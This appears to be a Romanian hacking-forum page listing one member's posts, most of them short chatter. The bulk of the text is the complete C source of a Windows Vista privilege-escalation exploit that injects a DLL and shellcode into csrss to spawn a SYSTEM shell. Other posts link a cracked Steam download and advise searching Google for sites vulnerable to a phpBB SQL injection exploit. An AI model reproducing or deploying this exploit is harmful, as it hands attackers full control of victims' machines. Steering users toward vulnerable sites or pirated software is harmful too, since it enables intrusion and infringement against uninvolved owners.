Imperfect
Active Members-
Posts
82 -
Joined
-
Last visited
Everything posted by Imperfect
-
Fiat punto & Seat .... fmm de bere
-
http://rstzone.net/forum/viewtopic.php?t=6265 Care minte ? Sau si g3o la copiat de undeva ?
-
[offtopic]Shocky teai gandit sa-ti dai o defragmentare :roll:
-
Uite aici , sper ca asta cauti ! Dai click aici . Undeva mai jos scrie "VNC Authentication Bypass Vulnerability Video" . Sper ca esti multumit . Bafta !
-
Sunt orb sau acea pagina nu mai exista ? Si nici un alt index ( deocamdata ) .
-
Multumesc MostWanted , Multumesc Rotty ! Raman dator .
-
MARFA ! Vazusem si eu una de olt , ma cautam de telefon telefonu cand lam scos ... deja nu se mai vedea masina :cry:
-
Are cineva un CFG , frumos pentru CS ? @Rotty am vazut ca postasai pe un forum de design la sectiunea "Counter-Strike" ca ai pus tu intr-un cfg Holly ... , poti sa-l trimit in pm sau sa-l postezi aici ?
-
deface it! un mic wargame facut de mine
Imperfect replied to escalation666's topic in Challenges (CTF)
http://aeon666.ifastnet.com/rst.php -
http://softwareaudit.ifastnet.com/rst.php
-
deface it! un mic wargame facut de mine
Imperfect replied to escalation666's topic in Challenges (CTF)
Cum zice escalation , e foarte usor . Iti mai bot da un hint : Un fisier a fost creeat sunt numele de exemplu.html inloc de exemplu.txt .. e mai mult un "Mura-n gura" . Spor. -
Career Academy Hacking, Penetration Testing and Counter 17CD
Imperfect replied to AlucardHao's topic in Tutoriale video
Destule, ar fi dragut daca ai putea sa le urci pe un torrent cu viteza bun -
Pentru cei care nu aveti un host unde sa urcati scriptul . Am pus scriptul pe site-ul meu. Pentru link dati un click aici : http://rstzone.net/forum/viewtopic.php?p=39751#39751 Bafta.
-
//26-12-2006 ]erasmus[/ORC //exploit NtRaiseHardError privesc and load dll into csrss //this version only is vista, other version can be worked //with proper offsets, i will complete them soon //imperfect but sometime work, ok for proto type;) //dll limit to 8 chars but maybe can work around by //\xxx\..\dll type trick and use LoadLibraryW, now is //C:\TEST but another drive maybe work #define offs1 0x30 #define offs2 0xBBD0 #include "windows.h" #include "stdio.h" DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD, PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD,PVOID, PDWORD); DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWORD,PVOID, DWORD,PDWORD); DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,PVOID*, DWORD,PDWORD); HANDLE hl; HANDLE hs; DWORD sb; LPVOID lpc(LPCWSTR w){//cesar trick WORD n[4]; SECURITY_QUALITY_OF_SERVICE q; LPVOID p; DWORD d; DWORD c[6],s[3]; BYTE b[0x28]; n[0]=n[1]=wcslen(w)*2; *(PDWORD)(n+2)=(DWORD)w; memset(&q,0,sizeof(q)); q.Length=sizeof(q); p=NULL; d=0x1000; memset(&c,0,sizeof(c)); c[0]=sizeof(c); memset(&s,0,sizeof(s)); s[0]=sizeof(s); memset(&b,0,sizeof(); b[1]=1; hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL, PAGE_READWRITE,0,d,NULL); if(!hs)return NULL; p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); if(!p)return NULL; c[1]=(DWORD)hs; c[3]=d; c[4]=(DWORD)p; d=sizeof(; if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d)) return NULL; sb=c[5]; return p; } HANDLE e1,e11; DWORD WINAPI tp1(LPVOID a){ LPVOID p[7]; DWORD d; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0x1B001AE; p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; p[5]=(LPVOID)0x100010; p[6]=L"erasmus1"; while(1){ WaitForSingleObject(e1,INFINITE); NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e11); } return 0; } DWORD aaa,bbb; HANDLE e2,e22; DWORD WINAPI tp2(LPVOID a){ BYTE b[0xD8]; LPVOID p[7]; DWORD d; memset(&b,0,sizeof(); *(PDWORD)(b+0x3C)=2; *(PDWORD)(b+0x48)=1; *(PDWORD)(b+0x4C)=1; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0xD600D6; p[4]=&b; p[5]=(LPVOID)0x100010; p[6]=L"erasmus2"; while(1){ WaitForSingleObject(e2,INFINITE); memcpy(&b,"C:\\TEST",8); *(PDWORD)(b+0x08)=aaa; *(PDWORD)(b+0x0C)=bbb; *(PDWORD)(b+0x70)=aaa+0x100; *(PDWORD)(b+0x74)=aaa+0x100; NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e22); } return 0; } STARTUPINFO cps; PROCESS_INFORMATION cpi; void w(DWORD a,DWORD d){ HWND h; aaa=d; bbb=a; SetEvent(e1); do{h=FindWindow(NULL,"erasmus1");}while(!h); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); SetEvent(e2); do{h=FindWindow(NULL,"erasmus2");}while(!h); TerminateThread(cpi.hThread,0); Sleep(100); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); } int main(int c,char**v){ char sd[MAX_PATH]; char dp[MAX_PATH]; WCHAR pp[MAX_PATH]; WCHAR pn[MAX_PATH]; HMODULE nt,kr,ad; DWORD se,cs,ws,u,d,h; HANDLE t; LPBYTE sc; GetSystemDirectory(sd,sizeof(sd)); sprintf(dp,"%s\\csrsrv.dll",sd); cs=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\winsrv.dll",sd); ws=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\ntdll.dll",sd); nt=LoadLibrary(dp); sprintf(dp,"%s\\kernel32.dll",sd); kr=LoadLibrary(dp); sprintf(dp,"%s\\advapi32.dll",sd); ad=LoadLibrary(dp); *(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConnectPort"); *(LPVOID*)&NtQueryInformationProcess=GetProcAddress(nt, "NtQueryInformationProcess"); *(LPVOID*)&NtRaiseHardError=GetProcAddress(nt, "NtRaiseHardError"); if(2==c){ d=atoi(v[1]); if(!d){ printf("no args need\n"); return -1; } t=OpenProcess(PROCESS_ALL_ACCESS,0,d); if(!t){ printf("no args need\n"); return -1; } __asm mov eax,fs:[0x18] __asm mov eax,[eax+0x30] __asm mov eax,[eax+0x1D4] __asm mov se,eax if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se); else swprintf(pp,L"\\Windows"); swprintf(pn,L"%s\\ApiPort",pp); sc=(LPBYTE)lpc(pn); swprintf(pn,L"%s\\SbApiPort",pp); if(!sc)sc=(LPBYTE)lpc(pn); if(!sc)return -1; h=0; DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE)&h,0,0,2); WriteProcessMemory(t,&hs,&h,4,&d); WriteProcessMemory(t,&sb,&sb,4,&d); Sleep(INFINITE); }else{ STARTUPINFO cps; PROCESS_INFORMATION cpi; hs=sc=NULL; sb=0; memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId()); if(!CreateProcess(NULL,sd,NULL,NULL,0, CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,NULL,&cps, &cpi)){ printf("spawn fail\n"); return -1; } Sleep(3000); if(!hs){ printf("lpc fail\n"); return -1; } sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); } memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; e1=CreateEvent(NULL,0,0,NULL); e11=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp1,NULL,0,NULL); e2=CreateEvent(NULL,0,0,NULL); e22=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp2,NULL,0,NULL); u=cs+offs2; *(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"LoadLibraryA"); w(u,sb); Sleep(INFINITE); return 0; } //test.c //26-12-2006 ]erasmus[/ORC //dll for load in csrss by raise.c //repair csrss and create OWNED.TXT and try create system cmd //i can exec shell code in lpc shared section but LoadLibrary //is for work around of DEP on vista //also imperfect but also is proto type! //offsets is for vista #define offs1 0x5F89 #define offs2 0xBBD0 #define offs3 0xBBFC #define offs4 0x3F0CC #include "windows.h" LONG WINAPI uef(LPEXCEPTION_POINTERS a){ Sleep(INFINITE); return 0; } DWORD WINAPI tp(LPVOID a){ HMODULE kr,ws; BYTE b[0x100]; DWORD c,d; HANDLE h,t; kr=GetModuleHandle("kernel32"); ws=GetModuleHandle("winsrv"); h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWORD)ws+offs4)); c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(,MEM_COMMIT,PAGE_EXE CUTE_READWRITE); d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69); memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x 50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61\x30\x5C\x44\x65\x 66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63\x6D\x64\x00\x50\x 50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1\xFC\x51\x50\xE8\x 00\x00\x00\x00\x83\xC4\x58\xC3",73); *(LPDWORD)(b+65)=d; WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(,&d); t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_START_ROUTINE)c,NULL ,0,NULL); WaitForSingleObject(t,INFINITE); return 0; } BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){ DWORD cs,d; LPDWORD p,f,l; HANDLE h; if(DLL_PROCESS_ATTACH==dwReason){ SetUnhandledExceptionFilter(uef); h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL, CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL); WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL); CloseHandle(h); cs=(DWORD)GetModuleHandle("csrsrv"); *(LPDWORD)(cs+offs2)=0; __asm mov eax,esp __asm mov p,eax while(1){ if(cs+offs1==*p){ *p=(DWORD)ExitThread; d=p[1]+8; break; } p=p+1; } p=*(LPDWORD*)(cs+offs3)+2; f=p; while(d!=f[0])f=*(LPDWORD*)f; l=p; while(d!=l[1])l=*(LPDWORD*)(l+1); *(LPDWORD*)f=l; *(LPDWORD*)(l+1)=f; for(d=0;d<100;d=d+1){ p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8); memset(p,0,0xD8); p[2]=(DWORD)p+0x08; p[3]=(DWORD)p+0x08; p[4]=(DWORD)p+0x10; p[5]=(DWORD)p+0x10; p[13]=0x240000; p[15]=1; p[16]=1; p[28]=(DWORD)p+0x78; p[29]=(DWORD)p+0x80; } p=(LPDWORD)GetProcessHeap(); while(1){ p=p+1; if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&& !strcmp(*(LPSTR*)(p+1),"CSRSS")){ d=p[1]+6; while(1){ p=p-1; if(d-(DWORD)p==*p)break; } break; } } *(LPDWORD*)(cs+offs2)=p; Sleep(0); CreateThread(NULL,0,tp,NULL,0,NULL); } return TRUE; }
-
Cum sa downloadezi cat vrei ,fara cont de pe filehost
Imperfect replied to Carnage's topic in Tutoriale in romana
Ata era logic . -
Cu placere
-
Interant , multumesc. Pentru jucatori de CS am uploadat steam deja crakuit . Link : Click for download PacSteam Edit: Interesant* , eram foarte obosit
-
Foarte folositor , multumesc.
-
Cum sa downloadezi cat vrei ,fara cont de pe filehost
Imperfect replied to Carnage's topic in Tutoriale in romana
Dupa cum vezi merge : Image: @BryanMax : " cu ce browser ai incercat... daca cu mozilla...incearca cu Internet Explorel " nu e vorba de browser , am incercat cu mozill si IE si merge cu amandoua . -
phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Imperfect replied to Imperfect's topic in Exploituri
Sincer, nu am incercat scriptu , dar incerca sa cauti pe google : inurl :"alltopics.php" . Vezi ca nu cred ca vei avea noroc la primu site/prima pagina , daca tot vrei sa faci ceva cauta pana gasesti. -
phpBB 2.0.21 (alltopics.php) SQL Injection Exploit
Imperfect replied to Imperfect's topic in Exploituri
[offtopic=ne cunoastem]